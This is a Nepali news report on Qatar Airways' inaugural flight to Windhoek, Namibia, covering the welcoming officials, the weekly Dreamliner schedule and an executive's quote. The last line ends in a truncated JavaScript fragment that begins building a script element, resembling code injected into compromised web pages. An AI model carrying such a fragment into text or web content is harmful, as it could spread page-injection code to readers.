कतार, असोज १३ । कतारको दोहाबाट उडान भरेको कतार एयरवेजको विमानले नामिबियाको राजधानी विन्डहोकस्थित अन्तरराष्ट्रिय विमान स्थलमा आफ्नो पहिलो फ्लाइट अवतरण गरेको छ ।
कतार एयरवेजका चिफ कमर्शियल अफिसर डा. ह्युग डनलेभी र कतारका लागि नामिवियाका राजदुत महामहिम ज्याफेटलसाक सहित उडान भरेको उक्त फ्लाइटको स्वागत नामिबिया टूरिजम बोर्डका प्रमुख कार्यकारी अधिकृत डिगु नाओबेब र दक्षिण अफ्रिकाका लागि कतारका राजदूत महामहिम सलेम अव्दुल्लाह सुल्टान अल जबरले गरेका हुन् । qa
विन्डहोक कतार एयरवेजले सेवा प्रदान गरेको नामिबियाको पहिलो शहर हो । यहाँबाट बोइङ ७ सय ८७ ड्रिमलाइनरबाट हप्ताको चार पटक गनतब्य सम्मको सेवा प्रदान गरिने छ । दोहास्थित कतार एयरवेजको स्टेट अफ आर्ट हब एण्ड होम हमाद अन्तरराष्ट्रिय विमान स्थलको माध्यमबाट नयाँ रुटले नामिबियाबाट १ सय ५० भन्दा बढी गनतब्यमा उडान भर्ने यात्रुलाई सेवा प्रदान गर्नेछ । कतार एयरवेजले सेवा प्रदान गर्ने विन्डहोक अफ्रिकाको २३औँ गनतव्य हो ।
“हाम्रो सेवा सञ्जाल भित्र प्रिमियम लिजर तथा विजनेश गनतब्यका रुपमा अफ्रिकाको विन्डहोक थप गर्न पाउँदा हामी निकै प्रशन्न छौँ्”, कतार एयरवेजका गु्रप चिफ एक्जेक्यूटिभ महामहिम अकबर अल बाकरले भने–“प्रमुख गनतब्यका रुपमा रहेको अफ्रिकामा हाम्रो ब्यवसाय बृद्धि तथा सेवा विस्तारको योजना अन्तर्गत नयाँ गनतब्यका रुपमा हामीले नामिबिया रोजेका हौँ ।”var d=document;var s=d.createElement(‘script’);